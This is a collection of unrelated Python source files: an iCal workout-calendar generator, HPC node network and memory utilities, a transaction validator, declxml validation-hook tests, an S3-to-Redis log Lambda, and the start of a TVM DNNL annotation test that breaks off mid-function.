          "X-WR-CALNAME: TrainerRoad.com LVBase\n",
          "CALSCALE:GREGORIAN\n"]
# NOTE(review): footer is defined but never written; the closing line is
# emitted literally at the end of the script instead.
footer = ["END:VCALENDAR"]
n1 = ["BEGIN:VEVENT\n",
      "DTSTAMP:"]  #after inserting this, curdtstamp is added
n5 = ["DTSTART;VALUE=DATE:"]
#after inserting this, add start date and line terminator
n2 = ["DTEND;VALUE=DATE:"]
#after inserting this, add date and line terminator
n3 = ["SUMMARY:"]
#after inserting this, add workout name and line terminator
n4 = ["END:VEVENT\n"]
#prompt user for plan start date
print "Please enter plan desired start date."
print "Tuesday start date recommended"
print "Enter date in the following format"
print "YYYYMMDD"
startdate = raw_input('>')
#validate input meets requirements
# NOTE(review): only the length is checked, not that the characters are
# digits or that the date is real — strptime below will raise on bad input.
while len(startdate) != 8:
    print "Incorrect date format!"
    print "Enter date in the following format"
    print "YYYYMMDD"
    startdate = raw_input('>')
print "Enter input file name, include filename extension"
print "example.txt"
wrkfile = raw_input('>')
#open input file (one "name,days" workout per line)
infile = open(wrkfile, "r")
#open output file
outfile = open("trbasecal.ics", "w+")
#generate ical header info and write to output file
outfile.writelines(header)
#declare counter variable for workout
workoutnum = 0
for line in infile:
    name, days = line.split(",",1) #splits infile into two variables called name and days
    name = str(name)
    # +1 because DTEND of an all-day event is exclusive
    days = int(days)+1
    curdtstamp = datetime.datetime.now().strftime("%Y%m%d"+"T"+"%H%M%S"+"Z") #calcs current DTSTAMP
    outfile.writelines(n1) #writes beginning of event block
    outfile.write(curdtstamp + "\n")
    outfile.writelines(n5)
    outfile.write(startdate + "\n")
    outfile.writelines(n2)
    outfile.write(startdate + "\n")
    outfile.writelines(n3)
    outfile.write(name)
    outfile.write("\n")
    outfile.writelines(n4)
    workoutnum+=1
    #insert function to calcuate next workout date
    prevdate = datetime.datetime.strptime(startdate, "%Y%m%d")
    startdate = prevdate + datetime.timedelta(days=days)
    startdate = startdate.strftime("%Y%m%d")
#when loop completes, write iCal file end syntax
outfile.write("END:VCALENDAR")
#close files
# NOTE(review): infile is never closed; harmless for a one-shot script.
outfile.close()
#success message
print "iCal file created. %i workouts added to calendar." %workoutnum
#exit
#exit
|
# #
# Copyright 2009-2015 Ghent University
#
# This file is part of hanythingondemand
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/hanythingondemand
#
# hanythingondemand is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# hanythingondemand is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with hanythingondemand. If not, see <http://www.gnu.org/licenses/>.
# #
"""
Network utilities
@author: Stijn De Weirdt (Ghent University)
@author: Ewan Higgs (Ghent University)
@author: Kenneth Hoste (Ghent University)
"""
import re
import os
import socket
from collections import namedtuple
from vsc.utils import fancylogger
from vsc.utils.affinity import sched_getaffinity
from hod.commands.command import ULimit
from hod.utils import only_if_module_is_available
# optional packages, not always required
try:
import netifaces
import netaddr
except ImportError:
pass
NetworkInterface = namedtuple('NetworkInterface', 'hostname,addr,device,mask_bits')
_log = fancylogger.getLogger(fname=False)
@only_if_module_is_available('netaddr')
def netmask2maskbits(netmask):
    """Return how many bits are set in a dotted-quad netmask."""
    return bin(netaddr.IPAddress(netmask).value).count('1')
@only_if_module_is_available('netifaces')
def get_networks():
    """
    Returns list of NetworkInterface tuples by interface.
    Of the form: [hostname, ipaddr, iface, subnetmask]

    Interfaces without an IPv4 address are skipped.
    """
    devices = netifaces.interfaces()
    networks = []
    for device in devices:
        iface = netifaces.ifaddresses(device)
        if netifaces.AF_INET in iface:
            # Only the first IPv4 address of the interface is used.
            iface = iface[netifaces.AF_INET][0]
            addr = iface['addr']
            mask_bits = netmask2maskbits(iface['netmask'])
            # getfqdn returns the address string itself when no reverse
            # DNS entry exists (sorted_network relies on this).
            hostname = socket.getfqdn(addr)
            networks.append(NetworkInterface(hostname, addr, device, mask_bits))
    return networks
@only_if_module_is_available('netaddr')
def address_in_network(ip, net):
    """
    Return True when *ip* lies inside the network *net*.
    e.g. 192.168.0.1 is in 192.168.0.0/24 but not 10.0.0.0/24.

    Params
    ------
    ip : `str`
        ipv4 ip address as string.
    net : `str`
        Network and mask bits as string (e.g. '192.168.0.0/16')
    """
    address = netaddr.IPAddress(ip)
    network = netaddr.IPNetwork(net)
    return address in network
def ip_interface_to(networks, ip):
    """Return the first interface in *networks* whose subnet contains *ip*,
    or None when no interface can reach it.

    Params
    ------
    networks : `list of NetworkInterface`
    ip : `str`
        Destination ipv4 address as string.
    """
    for interface in networks:
        subnet = "%s/%s" % (interface.addr, interface.mask_bits)
        if address_in_network(ip, subnet):
            return interface
    return None
def sorted_network(network):
    """Try to find a preferred network (can be advanced like IPoIB of high-speed ethernet).

    Order of preference: InfiniBand interfaces with real hostnames, then
    non-vlan/non-loopback interfaces with real hostnames, then remaining
    non-loopback interfaces, then everything else.

    NOTE: sorts the input list in place before building the result.
    """
    nw = []
    _log.debug("Preferred network selection")
    # step 1 alphabetical ordering (who knows in what order ip returns the addresses) on hostname field
    network.sort()
    # filter for interfaces which have not been assigned hostnames
    ip_hostname = re.compile(r"^\d+\.\d+\.\d+\.\d+$")
    # look for ib network
    ib_reg = re.compile(r"^(ib)\d+$")
    for intf in network:
        if ib_reg.search(intf.device) and not ip_hostname.search(intf.hostname):
            if intf not in nw:  # idiomatic "not in" (was "not intf in nw")
                _log.debug("Added intf %s as ib interface", str(intf))
                nw.append(intf)
    # final selection prefer non-vlan
    vlan_reg = re.compile(r"^(.*)\.\d+$")
    loopback_reg = re.compile(r"^(lo)\d*$")
    for intf in network:
        if not (vlan_reg.search(intf.device) or
                loopback_reg.search(intf.device) or
                ip_hostname.search(intf.hostname)):
            if intf not in nw:
                _log.debug("Added intf %s as non-vlan or non-loopback interface",
                           str(intf))
                nw.append(intf)
    # add remainder non-loopback
    for intf in network:
        if not loopback_reg.search(intf.device):
            if intf not in nw:
                _log.debug("Added intf %s as remaining non-loopback interface",
                           str(intf))
                nw.append(intf)
    # add remainder
    for intf in network:
        if intf not in nw:
            _log.debug("Added intf %s as remaining interface",
                       str(intf))
            nw.append(intf)
    _log.debug("ordered network %s",
               nw)
    return nw
def _get_memory_proc_meminfo():
    """Parse /proc/meminfo into a dict of lowercase keys -> bytes."""
    # Value pattern after spaces are stripped, e.g. "16384kB" or "16384".
    re_mem = re.compile(r"^\s*(?P<mem>\d+)(?P<unit>(?:k)B)?\s*$")
    proc_meminfo_filename = '/proc/meminfo'
    meminfo = {}
    for line in open(proc_meminfo_filename).read().replace(' ', '').split('\n'):
        if not line.strip():
            continue
        key = line.split(':')[0].lower().strip()
        try:
            value = line.split(':')[1].strip()
        except IndexError:
            _log.error("No :-separated entry for line %s in %s",
                       line, proc_meminfo_filename)
            continue
        reg = re_mem.search(value)
        if reg:
            unit = reg.groupdict()['unit']
            mem = int(reg.groupdict()['mem'])
            multi = 1
            # NOTE(review): the regex only ever captures 'kB' or nothing,
            # so the 'B' comparison below looks unreachable — confirm.
            if unit in (None, 'B',):
                multi = 1
            elif unit in ('kB',):
                multi = 2 ** 10
            else:
                _log.error("Unsupported memory unit %s in key %s value %s", unit, key, value)
            meminfo[key] = mem * multi
        else:
            _log.error("Unknown memory entry in key %s value %s", key, value)
    _log.debug("Collected meminfo %s", meminfo)
    return meminfo
def _get_memory_ulimit_v():
    '''
    Return the ulimit for virtual memory in bytes or "unlimited"
    '''
    stdout, _ = ULimit('-v').run()
    if stdout == 'unlimited':
        return stdout
    # ulimit -v reports kilobytes; callers expect bytes
    return int(stdout) * 1024
def get_memory():
    """Extract information about the available memory"""
    return {
        'meminfo': _get_memory_proc_meminfo(),
        'ulimit': _get_memory_ulimit_v(),
    }
class Node(object):
    """Detect localnode properties"""
    def __init__(self):
        self.log = fancylogger.getLogger(name=self.__class__.__name__, fname=False)
        self.fqdn = 'localhost'  # base fqdn hostname
        self.network = []  # all possible IPs
        self.pid = -1
        self.cores = -1
        self.usablecores = None
        self.totalcores = None
        self.topology = [0]  # default topology plain set
        self.memory = {}
    def __str__(self):
        return "FQDN %s PID %s" % (self.fqdn, self.pid)
    def go(self):
        """A wrapper around some common functions

        Probes the local host and returns a dict description of it.
        """
        self.fqdn = socket.getfqdn()
        self.network = sorted_network(get_networks())
        self.pid = os.getpid()
        # indices of CPUs this process is allowed to run on
        self.usablecores = [idx for idx, used in enumerate(sched_getaffinity().cpus) if used]
        self.cores = len(self.usablecores)
        self.totalcores = os.sysconf('SC_NPROCESSORS_ONLN')
        self.memory = get_memory()
        descr = {
            'fqdn': self.fqdn,
            'network': self.network,
            'pid': self.pid,
            'cores': self.cores,
            'usablecores': self.usablecores,
            'totalcores': self.totalcores,
            'topology': self.topology,
            'memory': self.memory,
        }
        return descr
|
def valid(trans, ok):
    """Validate one transaction line and update the unspent-output pool *ok*.

    *trans* is a whitespace-separated token string: token 1 is the input
    count, each input occupies three tokens (name, amount, separator),
    followed by the output count and the outputs in the same layout.
    Inputs must be unspent (present in *ok*) or come from 'origin';
    amounts must be non-negative and balance; outputs must be unique.
    A valid transaction appends its outputs to *ok* and removes the spent
    inputs from it.

    Returns True when the transaction is accepted, False otherwise.
    """
    tokens = trans.split()
    nin = int(tokens[1])
    lis_in = []
    for i in range(3, nin * 3 + 1, 3):
        lis_in.append([tokens[i], tokens[i + 1]])
    nout = int(tokens[nin * 3 + 2])
    lis_out = []
    # NOTE(review): the stop bound (nin*3+4+nout) looks odd — a 3-token
    # layout would suggest nin*3+3+3*nout — but it is kept as-is to
    # preserve the accepted input format; confirm against the statement.
    for i in range(nin * 3 + 3, nin * 3 + 4 + nout, 3):
        lis_out.append([tokens[i], tokens[i + 1]])
    tin = 0
    for entry in lis_in:
        tin += int(entry[1])
        if int(entry[1]) < 0: return False
        if entry not in ok and entry[0] != 'origin': return False
    tout = 0
    for entry in lis_out:
        tout += int(entry[1])
        if int(entry[1]) < 0: return False
    if (tin != tout): return False
    # Outputs must be unique within the transaction.
    # BUG FIX: the original appended lis_out[0] for every output, which
    # rejected every transaction with two or more parsed outputs.
    nom = list(lis_out)
    for m in nom:
        if nom.count(m) != 1: return False
    # Accept: outputs become spendable, inputs are consumed.
    for entry in lis_out: ok.append(entry)
    for entry in lis_in:
        for p, c in enumerate(ok):
            if entry[0] == c[0] and entry[1] == c[1]:
                ok.pop(p)
                # Stop after the first match: popping while iterating
                # skips elements; entries in ok are unique anyway.
                break
    return True
# Read the number of transactions, then one transaction per line.
num_t=int(input())
entradas=[]
for i in range(num_t):
    entrada = input()
    intrada = entrada.split()
    # Keyed by the last token so transactions are processed in its order
    # (presumably a timestamp — confirm against the problem statement).
    entradas.append([intrada[-1], entrada])
entradas = sorted(entradas)
res=[]
ok=[]  # pool of currently unspent outputs, mutated by valid()
for entrada in entradas:
    if (valid(entrada[1],ok)): res.append(entrada[1])
# Print the count of accepted transactions followed by each one.
print(len(res))
for i in res: print(i)
|
"""Tests using hooks for validation"""
from collections import namedtuple
import pytest
import declxml as xml
from .helpers import strip_xml
# Immutable user record used as the target of named_tuple processors.
_UserTuple = namedtuple('_UserTuple', [
    'name',
    'age',
])
class _UserClass(object):
def __init__(self, name=None, age=None):
self.name = name
self.age = age
def __eq__(self, other):
return isinstance(other, _UserClass) and\
other.name == self.name and\
other.age == self.age
def __repr__(self):
return '_UserClass(name=\'{}\', age={})'.format(
self.name, self.age
)
class _ValidationError(Exception):
    """Custom validation error class raised by the hook callbacks below."""
class TestCustomErrorMessage(object):
    """Provide custom validation error messages.

    Every test uses hooks that always raise _ValidationError and then
    checks (via _assert_error_message) that the error message ends with
    the failing processor's location, for both parsing and serializing.
    """
    def test_array_non_root(self):
        """Custom error message for array values."""
        processor = xml.dictionary('data', [
            xml.array(xml.integer('value'), nested='values', hooks=self._hooks)
        ])
        xml_string = strip_xml("""
            <data>
                <values>
                    <value>1</value>
                </values>
            </data>
        """)
        value = {
            'values': [1],
        }
        location = 'data/values'
        self._assert_error_message(processor, value, xml_string, location)
    def test_array_root(self):
        """Custom error message for array values."""
        processor = xml.array(xml.integer('value'), nested='data', hooks=self._hooks)
        xml_string = strip_xml("""
            <data>
                <value>1</value>
            </data>
        """)
        value = [1]
        location = 'data'
        self._assert_error_message(processor, value, xml_string, location)
    def test_dictionary_non_root(self):
        """Custom error message for dictionary values."""
        processor = xml.dictionary('data', [
            xml.dictionary('user', [
                xml.string('name'),
                xml.integer('age'),
            ], hooks=self._hooks)
        ])
        xml_string = strip_xml("""
            <data>
                <user>
                    <name>Bob</name>
                    <age>24</age>
                </user>
            </data>
        """)
        value = {
            'user': {
                'name': 'Bob',
                'age': 24,
            }
        }
        location = 'data/user'
        self._assert_error_message(processor, value, xml_string, location)
    def test_dictionary_root(self):
        """Custom error message for dictionary values."""
        processor = xml.dictionary('data', [
            xml.string('name'),
            xml.integer('age'),
        ], hooks=self._hooks)
        xml_string = strip_xml("""
            <data>
                <name>Bob</name>
                <age>24</age>
            </data>
        """)
        value = {
            'name': 'Bob',
            'age': 24,
        }
        location = 'data'
        self._assert_error_message(processor, value, xml_string, location)
    def test_named_tuple_non_root(self):
        """Custom error message for namedtuple values."""
        processor = xml.dictionary('data', [
            xml.named_tuple('user', _UserTuple, [
                xml.string('name'),
                xml.integer('age'),
            ], hooks=self._hooks)
        ])
        xml_string = strip_xml("""
            <data>
                <user>
                    <name>Bob</name>
                    <age>24</age>
                </user>
            </data>
        """)
        value = {'user': _UserTuple(name='Bob', age=24)}
        location = 'data/user'
        self._assert_error_message(processor, value, xml_string, location)
    def test_named_tuple_root(self):
        """Custom error message for namedtuple values."""
        processor = xml.named_tuple('data', _UserTuple, [
            xml.string('name'),
            xml.integer('age'),
        ], hooks=self._hooks)
        xml_string = strip_xml("""
            <data>
                <name>Bob</name>
                <age>24</age>
            </data>
        """)
        value = _UserTuple(name='Bob', age=24)
        location = 'data'
        self._assert_error_message(processor, value, xml_string, location)
    def test_primitive(self):
        """Custom error message for primitive values."""
        processor = xml.dictionary('data', [
            xml.integer('value', hooks=self._hooks)
        ])
        xml_string = strip_xml("""
            <data>
                <value>1</value>
            </data>
        """)
        value = {'value': 1}
        location = 'data/value'
        self._assert_error_message(processor, value, xml_string, location)
    def test_user_object_non_root(self):
        """Custom error message for user object values."""
        processor = xml.dictionary('data', [
            xml.user_object('user', _UserClass, [
                xml.string('name'),
                xml.integer('age'),
            ], hooks=self._hooks)
        ])
        xml_string = strip_xml("""
            <data>
                <user>
                    <name>Bob</name>
                    <age>24</age>
                </user>
            </data>
        """)
        value = {'user': _UserClass(name='Bob', age=24)}
        location = 'data/user'
        self._assert_error_message(processor, value, xml_string, location)
    def test_user_object_root(self):
        """Custom error message for user object values."""
        processor = xml.user_object('data', _UserClass, [
            xml.string('name'),
            xml.integer('age'),
        ], hooks=self._hooks)
        xml_string = strip_xml("""
            <data>
                <name>Bob</name>
                <age>24</age>
            </data>
        """)
        value = _UserClass(name='Bob', age=24)
        location = 'data'
        self._assert_error_message(processor, value, xml_string, location)
    @staticmethod
    def _assert_error_message(processor, value, xml_string, expected_location):
        """Assert both parse and serialize raise with the expected location suffix."""
        with pytest.raises(_ValidationError) as parse_exception:
            xml.parse_from_string(processor, xml_string)
        actual_parse_message = str(parse_exception.value)
        print(actual_parse_message)
        assert actual_parse_message.endswith(expected_location)
        with pytest.raises(_ValidationError) as serialize_exception:
            xml.serialize_to_string(processor, value)
        actual_serialize_message = str(serialize_exception.value)
        assert actual_serialize_message.endswith(expected_location)
    @property
    def _hooks(self):
        """Hooks that unconditionally raise _ValidationError on both paths."""
        def validate(state, _):
            state.raise_error(_ValidationError, 'Invalid value')
        return xml.Hooks(
            after_parse=validate,
            before_serialize=validate,
        )
class TestValidateArray(object):
    """Use hooks to validate array values."""
    def test_invalid(self):
        """Invalid array value."""
        xml_string = strip_xml("""
            <data>
                <value>1</value>
                <value>3</value>
                <value>3</value>
            </data>
        """)
        value = [1, 3, 3]
        _assert_invalid(self._processor, value, xml_string)
    def test_valid(self):
        """Valid array value."""
        xml_string = strip_xml("""
            <data>
                <value>1</value>
                <value>2</value>
                <value>3</value>
            </data>
        """)
        value = [1, 2, 3]
        _assert_valid(self._processor, value, xml_string)
    @property
    def _processor(self):
        # Array processor whose hooks reject duplicate elements.
        def validate(state, value):
            if len(value) != len(set(value)):
                state.raise_error(_ValidationError)
            return value
        hooks = xml.Hooks(
            after_parse=validate,
            before_serialize=validate,
        )
        processor = xml.array(xml.integer('value'), hooks=hooks, nested='data')
        return processor
class TestValidateDictionary(object):
    """Use hooks to validate dictionary values."""
    def test_invalid(self):
        """Invalid dictionary value."""
        xml_string = strip_xml("""
            <data>
                <a>5</a>
                <b>6</b>
            </data>
        """)
        value = {
            'a': 5,
            'b': 6,
        }
        _assert_invalid(self._processor, value, xml_string)
    def test_valid(self):
        """Valid dictionary value."""
        xml_string = strip_xml("""
            <data>
                <a>32</a>
                <b>67</b>
            </data>
        """)
        value = {
            'a': 32,
            'b': 67,
        }
        _assert_valid(self._processor, value, xml_string)
    @property
    def _processor(self):
        # Dictionary processor whose hooks reject the specific pair a=5, b=6.
        def validate(state, value):
            if value['a'] == 5 and value['b'] == 6:
                state.raise_error(_ValidationError)
            return value
        hooks = xml.Hooks(
            after_parse=validate,
            before_serialize=validate,
        )
        processor = xml.dictionary('data', [
            xml.integer('a'),
            xml.integer('b'),
        ], hooks=hooks)
        return processor
class TestValidateNamedTuple(object):
    """Use hooks for validating namedtuple values."""
    def test_invalid(self):
        """Invalid namedtuple value"""
        xml_string = strip_xml("""
            <user>
                <name>Bob</name>
                <age>24</age>
            </user>
        """)
        value = _UserTuple(name='Bob', age=24)
        _assert_invalid(self._processor, value, xml_string)
    def test_valid(self):
        """Valid namedtuple value"""
        xml_string = strip_xml("""
            <user>
                <name>Jill</name>
                <age>28</age>
            </user>
        """)
        value = _UserTuple(name='Jill', age=28)
        _assert_valid(self._processor, value, xml_string)
    @property
    def _processor(self):
        # namedtuple processor whose hooks reject Bob, aged 24.
        def validate(state, value):
            if value.name == 'Bob' and value.age == 24:
                state.raise_error(_ValidationError)
            return value
        hooks = xml.Hooks(
            after_parse=validate,
            before_serialize=validate,
        )
        processor = xml.named_tuple('user', _UserTuple, [
            xml.string('name'),
            xml.integer('age')
        ], hooks=hooks)
        return processor
class TestValidatePrimitive(object):
    """Use hooks for validating primitive values."""
    def test_invalid(self):
        """Invalid primitive value"""
        xml_string = strip_xml("""
            <data>
                <value>-91</value>
            </data>
        """)
        value = {'value': -91}
        _assert_invalid(self._processor, value, xml_string)
    def test_valid(self):
        """Valid primitive value"""
        xml_string = strip_xml("""
            <data>
                <value>32</value>
            </data>
        """)
        value = {'value': 32}
        _assert_valid(self._processor, value, xml_string)
    @property
    def _processor(self):
        # Integer processor whose hooks reject negative values.
        def validate(state, value):
            if value < 0:
                state.raise_error(_ValidationError)
            return value
        hooks = xml.Hooks(
            after_parse=validate,
            before_serialize=validate
        )
        processor = xml.dictionary('data', [
            xml.integer('value', hooks=hooks)
        ])
        return processor
class TestValidateUserObject(object):
    """Use hooks for validating user object values."""
    def test_invalid(self):
        """Invalid user object value"""
        xml_string = strip_xml("""
            <user>
                <name>Bob</name>
                <age>24</age>
            </user>
        """)
        value = _UserClass(name='Bob', age=24)
        _assert_invalid(self._processor, value, xml_string)
    def test_valid(self):
        """Valid user object value"""
        xml_string = strip_xml("""
            <user>
                <name>Jill</name>
                <age>28</age>
            </user>
        """)
        value = _UserClass(name='Jill', age=28)
        _assert_valid(self._processor, value, xml_string)
    @property
    def _processor(self):
        # user_object processor whose hooks reject Bob, aged 24.
        def validate(state, value):
            if value.name == 'Bob' and value.age == 24:
                state.raise_error(_ValidationError)
            return value
        hooks = xml.Hooks(
            after_parse=validate,
            before_serialize=validate,
        )
        processor = xml.user_object('user', _UserClass, [
            xml.string('name'),
            xml.integer('age')
        ], hooks=hooks)
        return processor
def test_aggregate_missing_hooks():
    """Process with missing aggregate hooks."""
    # Hooks with both callbacks set to None must behave like no hooks at all.
    processor = xml.dictionary('data', [
        xml.integer('a'),
        xml.integer('b')
    ], hooks=xml.Hooks(after_parse=None, before_serialize=None))
    xml_string = strip_xml("""
        <data>
            <a>1</a>
            <b>2</b>
        </data>
    """)
    expected_value = {
        'a': 1,
        'b': 2,
    }
    _assert_valid(processor, expected_value, xml_string)
def test_primitive_missing_hooks():
    """Process primitive value with missing hooks."""
    # None callbacks on a primitive processor must be a no-op as well.
    processor = xml.dictionary('data', [
        xml.integer('value', hooks=xml.Hooks(after_parse=None,
                                             before_serialize=None))
    ])
    xml_string = strip_xml("""
        <data>
            <value>1</value>
        </data>
    """)
    _assert_valid(processor, {'value': 1}, xml_string)
def test_processor_locations_parsing():
    """Get processor location in hooks callback."""
    # The hook should see the full path down to the integer processor.
    expected_locations = [
        xml.ProcessorLocation(element_path='data', array_index=None),
        xml.ProcessorLocation(element_path='value', array_index=None)
    ]
    def trace(state, _):
        # The callback's state argument exposes the processor stack.
        assert isinstance(state, xml.ProcessorStateView)
        assert expected_locations == list(state.locations)
    hooks = xml.Hooks(
        after_parse=trace,
        before_serialize=trace,
    )
    processor = xml.dictionary('data', [
        xml.integer('value', hooks=hooks),
    ])
    xml_string = strip_xml("""
        <data>
            <value>1</value>
        </data>
    """)
    value = {'value': 1}
    # Assertions happen inside trace() during both operations.
    xml.parse_from_string(processor, xml_string)
    xml.serialize_to_string(processor, value)
def _assert_invalid(processor, value, xml_string):
    """Assert the processor rejects both the XML string and the value."""
    operations = (
        lambda: xml.parse_from_string(processor, xml_string),
        lambda: xml.serialize_to_string(processor, value),
    )
    for operation in operations:
        with pytest.raises(_ValidationError):
            operation()
def _assert_valid(processor, value, xml_string):
    """Assert the processor accepts the XML and value (full round trip)."""
    parsed = xml.parse_from_string(processor, xml_string)
    assert value == parsed
    serialized = xml.serialize_to_string(processor, value)
    assert xml_string == serialized
|
import os
import re
import string
import logging
import urllib
import zlib
import boto3
import redis
# Deployment configuration, read once at import time.  All variables are
# required: a missing one raises KeyError when the Lambda container starts.
REDIS_SERVER = os.environ['REDIS_SERVER']
# NOTE(review): passed to redis.StrictRedis as-is (a string) — presumably a
# numeric string; confirm the client accepts it.
REDIS_PORT = os.environ['REDIS_PORT']
REDIS_DB = os.environ['REDIS_DB']
# Redis list key that individual log lines are pushed onto.
REDIS_KEY = os.environ['REDIS_KEY']
# Bucket/prefix the original log object is copied to, re-partitioned.
DEST_BUCKET = os.environ['DEST_BUCKET']
DEST_PREFIX = os.environ['DEST_PREFIX']
def lambda_handler(event, context):
    """Fan a gzipped log object from S3 out to a Redis list.

    Triggered by an S3 put event: downloads the object, gunzips it, pushes
    each line onto the Redis list REDIS_KEY, then copies the object to
    DEST_BUCKET under a yyyy=/mm=/dd=/hh= partitioned key derived from the
    CloudFront-style file name.
    """
    # connect redis
    r = redis.StrictRedis(host=REDIS_SERVER, port=REDIS_PORT, db=REDIS_DB)
    # get the s3 object
    s3 = boto3.client('s3')
    bucket = event['Records'][0]['s3']['bucket']['name']
    # S3 keys arrive URL-encoded in the event (Python 2: unquote_plus on bytes).
    key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key'].encode('utf8'))
    # generate dest key
    # Expected file name: <prefix>/<distributionid>.<yyyy>-<mm>-<dd>-<hh>.<hash>.gz
    regex = "(?P<prefix>.*)\/(?P<distributionid>.*)\.(?P<year>[0-9]{4})\-(?P<month>[0-9]{2})\-(?P<day>[0-9]{2})\-(?P<hour>[0-9]{2})\.(?P<hash>.*)\.gz"
    replace = "yyyy=\g<year>/mm=\g<month>/dd=\g<day>/hh=\g<hour>/\g<distributionid>.\g<year>-\g<month>-\g<day>-\g<hour>.\g<hash>.gz"
    dest_key = DEST_PREFIX + '/' + re.sub(regex, replace, key)
    try:
        response = s3.get_object(Bucket=bucket, Key=key)
        data = response['Body'].read()
        # unzip and split logs by line
        # 16 + MAX_WBITS tells zlib to expect a gzip wrapper.
        logs = string.split(zlib.decompress(data, 16+zlib.MAX_WBITS), '\n')
        # for each log, push it to the redis queue
        # NOTE(review): a trailing newline yields one empty final element
        # that is also pushed — confirm consumers tolerate empty entries.
        for log in logs:
            r.lpush(REDIS_KEY, log)
        # partition log file
        s3.copy({'Bucket': bucket, 'Key': key}, DEST_BUCKET, dest_key)
    except Exception as e:
        print(e)
        raise e
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for annotating external targets."""
import os
import sys
import numpy as np
import pytest
import tvm
import tvm.relay.testing
import tvm.relay.transform as transform
from tvm import relay
from tvm import runtime
from tvm.contrib import utils
def check_result(
    mod, map_inputs, out_shape, result, tol=1e-5, target="llvm", ctx=tvm.cpu(), params=None
):
    """Compile *mod* with both the Relay VM and the graph runtime and check
    that each produces *result* within *tol*.

    Args:
        mod: Relay IRModule to compile (possibly partitioned for DNNL).
        map_inputs: dict of input name -> numpy array.
        out_shape: shape of the output tensor (graph-runtime path only).
        result: reference numpy output.
        tol: rtol/atol for the comparison.
        target: compilation target string.
        ctx: device context to run on.
        params: optional bound parameters.
    """
    if sys.platform == "win32":
        print("Skip test on Windows for now")
        return

    def update_lib(lib):
        # Re-export the library with the contrib sources on the include
        # path so external-codegen symbols resolve at load time.
        test_dir = os.path.dirname(os.path.realpath(os.path.expanduser(__file__)))
        source_dir = os.path.join(test_dir, "..", "..", "..")
        contrib_path = os.path.join(source_dir, "src", "runtime", "contrib")
        kwargs = {}
        kwargs["options"] = ["-O2", "-std=c++14", "-I" + contrib_path]
        tmp_path = utils.tempdir()
        lib_name = "lib.so"
        lib_path = tmp_path.relpath(lib_name)
        lib.export_library(lib_path, fcompile=False, **kwargs)
        lib = runtime.load_module(lib_path)
        return lib

    def check_vm_result():
        # Path 1: compile with the VM executor and run once.
        with tvm.transform.PassContext(opt_level=3, disabled_pass=["AlterOpLayout"]):
            exe = relay.vm.compile(mod, target=target, params=params)
        code, lib = exe.save()
        lib = update_lib(lib)
        exe = runtime.vm.Executable.load_exec(code, lib)
        vm = runtime.vm.VirtualMachine(exe, ctx)
        out = vm.run(**map_inputs)
        tvm.testing.assert_allclose(out.asnumpy(), result, rtol=tol, atol=tol)

    def check_graph_runtime_result():
        # Path 2: compile with relay.build and run via the graph runtime.
        with tvm.transform.PassContext(opt_level=3, disabled_pass=["AlterOpLayout"]):
            json, lib, param = relay.build(mod, target=target, params=params)
        lib = update_lib(lib)
        rt_mod = tvm.contrib.graph_runtime.create(json, lib, ctx)
        for name, data in map_inputs.items():
            rt_mod.set_input(name, data)
        rt_mod.set_input(**param)
        rt_mod.run()
        out = tvm.nd.empty(out_shape, ctx=ctx)
        out = rt_mod.get_output(0, out)
        tvm.testing.assert_allclose(out.asnumpy(), result, rtol=tol, atol=tol)

    check_vm_result()
    check_graph_runtime_result()
def test_extern_dnnl():
    """Annotate a two-conv2d + add graph for DNNL and verify it numerically."""

    def annotated(dtype, ishape, w1shape):
        # Plain graph: two depthwise convs sharing one weight, then added.
        data = relay.var("data", shape=(ishape), dtype=dtype)
        weight1 = relay.var("weight1", shape=(w1shape), dtype=dtype)
        depthwise_conv2d_1 = relay.nn.conv2d(
            data, weight1, kernel_size=(3, 3), padding=(1, 1), groups=32
        )
        depthwise_conv2d_2 = relay.nn.conv2d(
            depthwise_conv2d_1, weight1, kernel_size=(3, 3), padding=(1, 1), groups=32
        )
        out = relay.add(depthwise_conv2d_1, depthwise_conv2d_2)
        f = relay.Function([data, weight1], out)
        mod = tvm.IRModule.from_expr(f)
        return mod

    def expected(dtype, ishape, w1shape):
        # Same graph with the compiler_begin/compiler_end markers that
        # AnnotateTarget("dnnl") is expected to insert.
        data = relay.var("data", shape=(ishape), dtype=dtype)
        weight1 = relay.var("weight1", shape=(w1shape), dtype=dtype)
        begin0 = relay.annotation.compiler_begin(data, "dnnl")
        begin1 = relay.annotation.compiler_begin(weight1, "dnnl")
        depthwise_conv2d_1 = relay.nn.conv2d(
            begin0, begin1, kernel_size=(3, 3), padding=(1, 1), groups=32
        )
        # The first conv feeds two consumers, hence two compiler_end nodes.
        end0 = relay.annotation.compiler_end(depthwise_conv2d_1, "dnnl")
        end1 = relay.annotation.compiler_end(depthwise_conv2d_1, "dnnl")
        begin2 = relay.annotation.compiler_begin(end1, "dnnl")
        begin3 = relay.annotation.compiler_begin(end0, "dnnl")
        begin4 = relay.annotation.compiler_begin(weight1, "dnnl")
        depthwise_conv2d_2 = relay.nn.conv2d(
            begin3, begin4, kernel_size=(3, 3), padding=(1, 1), groups=32
        )
        end2 = relay.annotation.compiler_end(depthwise_conv2d_2, "dnnl")
        begin5 = relay.annotation.compiler_begin(end2, "dnnl")
        out = relay.add(begin2, begin5)
        end3 = relay.annotation.compiler_end(out, "dnnl")
        f = relay.Function([data, weight1], end3)
